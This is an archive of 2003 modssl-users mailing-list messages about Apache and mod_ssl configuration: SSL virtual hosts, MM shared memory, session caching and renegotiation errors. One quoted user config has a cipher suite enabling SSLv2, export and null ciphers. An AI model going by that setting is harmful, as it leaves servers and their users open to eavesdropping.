Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.6/8.11.4) with ESMTP id h574d1Bl010961
	for ; Sat, 7 Jun 2003 00:39:02 -0400
Date: Sat, 7 Jun 2003 00:39:01 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Possible mod_ssl bug (ssl_io_input_read) (fwd)
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


---------- Forwarded message ----------
Date: Fri, 06 Jun 2003 17:59:50 -0700
From: Justin Erenkrantz 
Reply-To: dev@httpd.apache.org
To: dev@httpd.apache.org
Subject: Re: Possible mod_ssl bug (ssl_io_input_read) (fwd)

The suggested API change to char_buffer_read is incorrect.  The filter_ctx
should not be passed to char_buffer_read.  The possibility I'd propose is just
to set buffer->length to 0 when it is exhausted and keep buffer->value
unchanged in this case (it's overwritten on char_buffer_write, so it will not
append to the old buffer - its value is inconsequential once its length is 0).
The AP_MODE_SPECULATIVE case in ssl_io_input_read could easily be modified to
handle this by not adjusting buffer->value.  That seems like it should solve
the problem and do it in a cleaner fashion (and save cycles!).

Yet, I wonder why AP_MODE_SPECULATIVE is being used.  Its purpose is very
narrow - it should only be used to support HTTP pipelining and only asking for
one byte.  Only connection-level filters will implement this mode - so any
request-level filter transformations won't be applied (i.e. mod_deflate if the
request body is inflated).  If you want to intercept the read data, then it
needs to be an input filter not an AP_MODE_SPECULATIVE call.  -- justin



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jun  8 18:24:05 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 44235A8963; Sun,  8 Jun 2003 18:24:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mocha.comcity.com (mail.comcity.com [209.66.93.2])
	by master.modssl.org (Postfix) with ESMTP id 84916A8935
	for ; Sun,  8 Jun 2003 18:24:03 +0200 (CEST)
Received: from java (unverified [209.10.62.9]) by mocha.comcity.com
 (Rockliffe SMTPRA 4.5.6) with ESMTP id  for ;
 Sun, 8 Jun 2003 09:28:41 -0700
Message-ID: <023601c32dda$ed6d7580$093e0ad1@comcity.com>
From: "ComCity" 
To: 
Subject: Vitual Hosts not working with SSL
Date: Sun, 8 Jun 2003 09:27:57 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "ComCity" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm very confused about the Virtual Host configuration in Apache
2.0....stuff that use to work seems like it doesn't and I gotta
think thats because I don't know what I'm doing.  ;)

I need to run Named-based virtual hosts as was as IP based virtual hosts.
The IP based virtual hosts need to simultaneously listen on port 80 and port
443 for the same IP address to handle ssl.  It seems to me I should be able
to do this:


Listen 80
Listen 443
NameVirtualHost 219.11.62.74

#Name-based Virtual Hosts first


DocumentRoot /home/webs/default
ServerName www.server1.com



DocumentRoot //server2
ServerName www.server2.com


#Ip-based virtual Hosts next


DocumentRoot /home/webs/SSLSite1
ServerName www.SSLSite1.com:80


# Then put this stuff in my SSL conf file.


DocumentRoot /home1/webs/SSLSite1
ServerName www.SSLSite1.com:443
SSLEngine ON
SSLCertificateFile /usr/local/certs/anything.com.crt
SSLCertificateKeyFile /usr/local/certs/anything.com.key


I understand that the limitations of SSL requiring a unique IP and that it
can not be a named-based host...but you should be able to run the
certificate on the same IP if the port is unique.  How is this done now?
How do you config a single IP for SSL on port 443 and reuse that IP for the
website on port 80?

Thank You very much.
Michael



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jun  8 20:58:41 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 68A37A8963; Sun,  8 Jun 2003 20:58:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from deepthought.cs.virginia.edu (deepthought.cs.Virginia.EDU [128.143.69.223])
	by master.modssl.org (Postfix) with ESMTP id B6323A8935
	for ; Sun,  8 Jun 2003 20:58:39 +0200 (CEST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id h58IvQ03017988;
	Sun, 8 Jun 2003 14:57:27 -0400
Date: Sun, 8 Jun 2003 14:57:26 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: ComCity 
Cc: modssl-users@modssl.org
Subject: Re: Vitual Hosts not working with SSL
In-Reply-To: <023601c32dda$ed6d7580$093e0ad1@comcity.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, 8 Jun 2003, ComCity wrote:

> I'm very confused about the Virtual Host configuration in Apache
> 2.0....stuff that use to work seems like it doesn't and I gotta
> think thats because I don't know what I'm doing.  ;)

Can you be more specific about what it's (not) doing?  Other than the fact
that the snippet you sent in omitted certain important SSL directives
(which are probably present elsewhere in your config file if it worked
under Apache 1.3), the config looks okay to me, at least in terms of
NBVH vs. IPBVH.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun  9 17:15:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CA9A8A8963; Mon,  9 Jun 2003 17:15:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mocha.comcity.com (mail.comcity.com [209.66.93.2])
	by master.modssl.org (Postfix) with ESMTP id 7572BA8937
	for ; Mon,  9 Jun 2003 17:15:52 +0200 (CEST)
Received: from java (unverified [209.10.62.9]) by mocha.comcity.com
 (Rockliffe SMTPRA 4.5.6) with ESMTP id ;
 Mon, 9 Jun 2003 08:20:34 -0700
Message-ID: <03d101c32e9a$9733c6e0$093e0ad1@comcity.com>
From: "ComCity" 
To: "Cliff Woolley" 
Cc: 
References: 
Subject: Re: Vitual Hosts not working with SSL
Date: Mon, 9 Jun 2003 08:19:53 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "ComCity" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks Cliff.  It was not loaded...Apache failed to start.  The solution,
copy the ssl.conf information into the http.conf file without changing a
single thing.


----- Original Message -----
From: "Cliff Woolley" 
To: "ComCity" 
Cc: 
Sent: Sunday, June 08, 2003 11:57 AM
Subject: Re: Vitual Hosts not working with SSL


> On Sun, 8 Jun 2003, ComCity wrote:
>
> > I'm very confused about the Virtual Host configuration in Apache
> > 2.0....stuff that use to work seems like it doesn't and I gotta
> > think thats because I don't know what I'm doing.  ;)
>
> Can you be more specific about what it's (not) doing?  Other than the fact
> that the snippet you sent in omitted certain important SSL directives
> (which are probably present elsewhere in your config file if it worked
> under Apache 1.3), the config looks okay to me, at least in terms of
> NBVH vs. IPBVH.
>
> --Cliff
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 10 23:31:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7EF1CA895E; Tue, 10 Jun 2003 23:31:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41506.mail.yahoo.com (web41506.mail.yahoo.com [66.218.93.89])
	by master.modssl.org (Postfix) with SMTP id 1D66BA8933
	for ; Tue, 10 Jun 2003 23:31:35 +0200 (CEST)
Message-ID: <20030610213128.87606.qmail@web41506.mail.yahoo.com>
Received: from [130.86.71.139] by web41506.mail.yahoo.com via HTTP; Tue, 10 Jun 2003 14:31:28 PDT
Date: Tue, 10 Jun 2003 14:31:28 -0700 (PDT)
From: kulkarni veena 
Subject: mm library enable or disable shared for modssl as DSO.
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I'm trying to use mm shared library for Apache2.0.45
with modssl as DSO . My question is should I configure
MM_shared library --enable-shared or --disable-shared.

Thanks in advance.

--veena

__________________________________
Do you Yahoo!?
Yahoo! Calendar - Free online calendar with sync to Outlook(TM).
http://calendar.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 10 23:39:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DAF07A895F; Tue, 10 Jun 2003 23:39:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 15319A893C
	for ; Tue, 10 Jun 2003 23:39:42 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id A004A6E4041; Tue, 10 Jun 2003 23:39:37 +0200 (CEST)
Date: Tue, 10 Jun 2003 23:39:37 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mm library enable or disable shared for modssl as DSO.
Message-ID: <20030610213937.GB22135@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <20030610213128.87606.qmail@web41506.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030610213128.87606.qmail@web41506.mail.yahoo.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Jun 10, 2003 at 02:31:28PM -0700, kulkarni veena wrote:
> Hello,
> 
> I'm trying to use mm shared library for Apache2.0.45
> with modssl as DSO . My question is should I configure
> MM_shared library --enable-shared or --disable-shared.
> 
There's no need for MM with apache2 - it has its own shared
memory handling built in if your os supports it.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 10 23:53:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EF736A895E; Tue, 10 Jun 2003 23:53:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41511.mail.yahoo.com (web41511.mail.yahoo.com [66.218.93.94])
	by master.modssl.org (Postfix) with SMTP id 44511A8933
	for ; Tue, 10 Jun 2003 23:53:40 +0200 (CEST)
Message-ID: <20030610215338.15163.qmail@web41511.mail.yahoo.com>
Received: from [130.86.72.20] by web41511.mail.yahoo.com via HTTP; Tue, 10 Jun 2003 14:53:38 PDT
Date: Tue, 10 Jun 2003 14:53:38 -0700 (PDT)
From: kulkarni veena 
Subject: Re: mm library enable or disable shared for modssl as DSO.
To: modssl-users@modssl.org
In-Reply-To: <20030610213937.GB22135@toftum.dk>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Thanks. To use the shared library from apache should
something be set while configuring apache? I'm using
SunOS 5.9 , does this OS support it?

I was trying to do this hoping this would make my
https server work for Internet explorer. 

-veena

--- Mads Toftum  wrote:
> On Tue, Jun 10, 2003 at 02:31:28PM -0700, kulkarni
> veena wrote:
> > Hello,
> > 
> > I'm trying to use mm shared library for
> Apache2.0.45
> > with modssl as DSO . My question is should I
> configure
> > MM_shared library --enable-shared or
> --disable-shared.
> > 
> There's no need for MM with apache2 - it has its own
> shared
> memory handling built in if your os supports it.
> 
> vh
> 
> Mads Toftum
> -- 
> `Darn it, who spiked my coffee with water?!' - lwall
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org


__________________________________
Do you Yahoo!?
Yahoo! Calendar - Free online calendar with sync to Outlook(TM).
http://calendar.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 11 01:50:12 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 26B28A895E; Wed, 11 Jun 2003 01:50:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ms-smtp-03.texas.rr.com (ms-smtp-03.texas.rr.com [24.93.36.231])
	by master.modssl.org (Postfix) with ESMTP id 711E3A8936
	for ; Wed, 11 Jun 2003 01:50:10 +0200 (CEST)
Received: from tom (cs666817-180.austin.rr.com [66.68.17.180])
	by ms-smtp-03.texas.rr.com (8.12.5/8.12.2) with SMTP id h5ANo10p015207
	for ; Tue, 10 Jun 2003 18:50:06 -0500 (CDT)
Message-ID: <017801c32fab$1e11c520$6501a8c0@austin.rr.com>
From: "Tom Bartling" 
To: 
References: 
Subject: Re: unknown protocol
Date: Tue, 10 Jun 2003 18:50:42 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4920.2300
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4920.2300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tom Bartling" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for your help, Owen! I did everything you said, although it didn't
work right away. I had to change "NameVirtualHost *" to "NameVirtualHost
*:80". Now, I need to get the certificate stuff worked out and I'm on my
way.

Thanks!
Tom



----- Original Message -----
From: "Boyle Owen" 
To: 
Sent: Monday, June 02, 2003 3:54 AM
Subject: RE: unknown protocol


>>-----Original Message-----
>>From: Tom Bartling [mailto:tom@tombartling.com]
>>
>If you'd care to post your config or send it directly, I'll
>have a look and see if there's anything wrong with it.

There are several minor problems with your config which, taken together, may
be adding up to the confusing behaviour you are seeing. If you work through
the following it may improve matters:

General Strategy:
- Since your server has two IP addresses, use default IP addressing (i.e.
listen to all active IPs).
- Since you need VirtualHosting, use this throughout (i.e. lose the idea of
a "main server").
- Aim for multiple name-based VHs on port 80 and one single SSL VH on port
443.

Details:
1) Don't use "Port" and "Listen". These two directives are very similar and
"Listen" is preferred ("Port" is deprecated): Remove all "Port" directives.

2) Don't use domain names in Listens or VHs since this makes your config
dependent on DNS. Use default:

Listen secure.mintecommerce.com:443 -> Listen 443
 -> 

(NB - the only thing which should define the SSL VH is the port number).

3) Move "main server" into first VH container. At the moment, this has only
a ServerName - this is odd and I've no idea what apache would do in this
case (I guess you expect it to default to the "main server" - I wouldn't
count on it). You can achieve this simply by moving the "main" DocumentRoot
into this VH:


ServerName www.mintecommerce.com
DocumentRoot "/usr/local/www/data"


the other directives can remain outside where they will apply globally as
appropriate.

4) To complete the encapsulation of HTTP and HTTPS, add port 80 to all HTTP
VHs:

 -> 

(already done this for the SSL VH in (2) above).

Now try a restart without SSL and check the name-based VHs all work,
including the "main" server. If that's OK, restart with SSL and test
https://www.mintecommerce.com/.

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored.


>>
>>
>>
>>----- Original Message -----
>>From: "Boyle Owen" 
>>To: 
>>Sent: Wednesday, May 28, 2003 3:31 AM
>>Subject: RE: unknown protocol
>>
>>
>>Plain text please...
>>
>>It looks like you are not succeeding in starting an SSL VH.
>>
>>Looking at your config, there is no obvious error, although I
>>don't know
>>why you put the "Listen 80" inside the IfDefine - this would mean that
>>even plain HTTP wouldn't work unless you started with SSL.
>>
>>Just to be clear how it works, "apachectl startssl" causes the apache
>>control script to execute "httpd -DSSL". This starts apache with the
>>environment variable SSL defined. So when apache finds an
>>
>>container, it evaluates the condition as "true" and so reads the
>>directives inside. This is the canonical way of selecting SSL.
>>
>>Of course, you don't need to bother with all of this. If you
>>put the SSL
>>VH outside the  block (or just remove the 
>>tags) then the SSL VH and its directives will fire up in a normal
>>"apachectl start".
>>
>>You might try this - just make sure you have a single VH on
>>port 443 and
>>a Listen 443 and it should startup. Be careful you don't have a plain
>>HTTP VH on port 443 - it could supersede the SSL VH. To test, what
>>happens if you make a plain HTTP request to port 443 (it shouldn't
>>work!)
>>
>>About the PHP warning - when you recompiled apache to include mod_ssl,
>>it patched the apache API to extend it to allow hooks into the OpenSSL
>>library (EAPI = Extended API). Since the PHP module was
>compiled before
>>this, it is expecting the standard API. Probably it will continue to
>>work since the EAPI is a superset of the API but you never
>>know if there
>>will be a conflict in some call somewhere (you'll get a seg fault if
>>there is). The safest thing to do is to recompile mod_php against the
>>new API.
>>
>>Rgds,
>>Owen Boyle
>>Disclaimer: Any disclaimer attached to this message may be ignored.
>>
>>
>>
>>-----Original Message-----
>>From: Tom Bartling [mailto:tom@tombartling.com]
>>Sent: Mittwoch, 28. Mai 2003 07:51
>>To: modssl-users@modssl.org
>>Subject: unknown protocol
>>
>>
>>Hi,
>>
>>I am new to the list and relatively new to administering SSL,
>so please
>>forgive me if this is not the right place to ask this question.
>>
>>I am having trouble getting SSL to work. I'm on FreeBSD 4.5
>Stable with
>>apache+mod_ssl-1.3.27+2.8.14 and openssl-0.9.7a_2.
>>
>>Everything seems to have installed okay and I can run
>>apachectl startssl
>>without any problems, but I can't get SSL to actually work. When I try
>>to go the url via https, it immediately displays the dreaded
>"this page
>>cannot be displayed" message. When I run apachectl
>configtest, it spits
>>out the following:
>>
>>apachectl configtest
>>[Tue May 27 23:20:56 2003] [warn] Loaded DSO libexec/apache/libphp4.so
>>uses plain Apache 1.3 API, this module might crash under EAPI! (please
>>recompile it with -DEAPI)
>>Syntax OK
>>
>>PHP works without any problems, so I'm not concerned about that at the
>>moment. The manual says to try:
>>
>>openssl s_client -connect localhost:443 -state -debug
>>
>>As an alternative, it suggests:
>>
>>curl https://localhost/
>>
>>Both display an error message:
>>
>>SSL: error:140770FC:SSL
>>routines:SSL23_GET_SERVER_HELLO:unknown protocol
>>
>>So, I'm thinkin' that the problem is in the httpd.conf file. A few
>>things that are in there of importance (excluding comments and all of
>>the other stuff) include:
>>
>>Port 80
>>
>>
>>Listen 80
>>Listen 443
>>
>>
>>
>>#
>>#
>>#
>>#
>>
>>
>>DocumentRoot "/usr/local/www/data"
>>ServerName www.mintecommerce.com
>>ServerAdmin webmaster@mintecommerce.com
>>ErrorLog /var/log/httpd-error.log
>>TransferLog /var/log/httpd-access.log
>>
>>SSLEngine on
>>SSLCipherSuite
>>ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>>SSLCertificateFile /usr/local/etc/apache/ssl.crt/server.crt
>>SSLCertificateKeyFile /usr/local/etc/apache/ssl.key/server.key
>>SSLCACertificatePath /usr/local/etc/apache/ssl.crt
>>SSLCARevocationPath /usr/local/etc/apache/ssl.crl
>>SSLVerifyClient require
>>
>>
>>
>>You can see where I tried different versions of the VirtualHost tag (I
>>did change the ServerName value for each variation). This is a server
>>that hosts several sites, but they all use the same IP, so all of the
>>VirtualHost tags are
>>
>>
>>...
>>
>>
>>This seems to get the job done for the few sites on this one computer,
>>but now I need SSL. I'm at a loss and any help would be appreciated.
>>
>>TIA,
>>
>>Tom
>>Diese E-mail ist eine private und persönliche Kommunikation. Sie hat
>>keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Swiss
>>Exchange.
>>This e-mail is of a private and personal nature. It is not related to
>>the exchange or business activities of the SWX Swiss Exchange. Le
>>présent e-mail est un message privé et personnel, sans rapport avec
>>l'activité boursière de la SWX Swiss Exchange
>>
>>This message is for the named person's use only. It may contain
>>confidential, proprietary or legally privileged information. No
>>confidentiality or privilege is waived or lost by any mistransmission.
>>If you receive this message in error, please notify the
>sender urgently
>>and then immediately delete the message and any copies of it from your
>>system. Please also immediately destroy any hardcopies of the message.
>>You must not, directly or indirectly, use, disclose,
>distribute, print,
>>or copy any part of this message if you are not the intended
>recipient.
>>The sender's company reserves the right to monitor all e-mail
>>communications through their networks. Any views expressed in this
>>message are those of the individual sender, except where the message
>>states otherwise and the sender is authorised to state them to be the
>>views of the sender's company.
>>
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>>______________________________________________________________________
>>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>User Support Mailing List                      modssl-users@modssl.org
>>Automated List Manager                            majordomo@modssl.org
>>
>Diese E-mail ist eine private und persönliche Kommunikation.
>Sie hat keinen Bezug zur Börsen- bzw. Geschäftstätigkeit der
>SWX Swiss Exchange. This e-mail is of a private and personal
>nature. It is not related to the exchange or business
>activities of the SWX Swiss Exchange. Le présent e-mail est un
>message privé et personnel, sans rapport avec l'activité
>boursière de la SWX Swiss Exchange
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
Diese E-mail ist eine private und persönliche Kommunikation. Sie hat keinen
Bezug zur Börsen- bzw. Geschäftstätigkeit der SWX Swiss Exchange. This
e-mail is of a private and personal nature. It is not related to the
exchange or business activities of the SWX Swiss Exchange. Le présent e-mail
est un message privé et personnel, sans rapport avec l'activité boursière de
la SWX Swiss Exchange.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 11 08:45:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 22A94A895E; Wed, 11 Jun 2003 08:45:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 30880A8936
	for ; Wed, 11 Jun 2003 08:45:36 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 657B56E4041; Wed, 11 Jun 2003 08:45:33 +0200 (CEST)
Date: Wed, 11 Jun 2003 08:45:33 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mm library enable or disable shared for modssl as DSO.
Message-ID: <20030611064533.GA14761@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <20030610213937.GB22135@toftum.dk> <20030610215338.15163.qmail@web41511.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030610215338.15163.qmail@web41511.mail.yahoo.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Jun 10, 2003 at 02:53:38PM -0700, kulkarni veena wrote:
> Hi,
> 
> Thanks. To use the shared library from apache should
> something be set while configuring apache? I'm using
> SunOS 5.9 , does this OS support it?
> 
It shouldn't be a problem on your os - at least I've used shared
memory session caching on solaris 7 & 8 many times. The thing to
configure is SSLSessionCache which should be set to something like:
SSLSessionCache shm:/usr/local/apache/logs/ssl_gcache_data(512000) 
http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslsessioncache

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 13 10:24:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 88E57A895E; Fri, 13 Jun 2003 10:24:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exchange.sds.no (exchange.sds.no [139.105.2.11])
	by master.modssl.org (Postfix) with ESMTP id 96133A8936
	for ; Fri, 13 Jun 2003 10:24:22 +0200 (CEST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id ; Fri, 13 Jun 2003 10:24:19 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: Problems with POSTing
Date: Fri, 13 Jun 2003 10:24:15 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello.

Have run into a strange problem with Apache/mod_ssl 2.0.43:

I have set up a url that requires client certificates. And GET operations on
this URL works very well indeed. But POST doesnt work:

[Thu Jun 12 11:06:27 2003] [error] SSL Re-negotiation in conjunction with
POST method not supported!
hint: try SSLOptions +OptRenegotiate

I have tried +OptRenegotiate all over, but it doesnt make a difference.

Googling a bit reveals that this used to be a problem, but it seemes to be
uncertain if it still is (in newer versions).

Have any of you run into this one?

Regards
Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 13 14:36:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A8DBBA895E; Fri, 13 Jun 2003 14:36:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hermes.ulaval.ca (hermes.ulaval.ca [132.203.250.27])
	by master.modssl.org (Postfix) with ESMTP id 39A8CA8936
	for ; Fri, 13 Jun 2003 14:36:18 +0200 (CEST)
Received: from sitpro (sitpro.sit.ulaval.ca [132.203.150.170])
	by hermes.ulaval.ca (8.12.9/8.12.9) with ESMTP id h5DCZlf2031424
	for ; Fri, 13 Jun 2003 08:35:47 -0400
From: "Pascal Rodrigue" 
To: 
Subject: RE: Problems with POSTing
Date: Fri, 13 Jun 2003 08:36:15 -0400
Organization: Universite Laval
Message-ID: <000801c331a8$61cda640$aa96cb84@sit.ulaval.ca>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4024
In-Reply-To: 
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pascal Rodrigue" 
X-List-Manager: Majordomo [version 1.94.5]
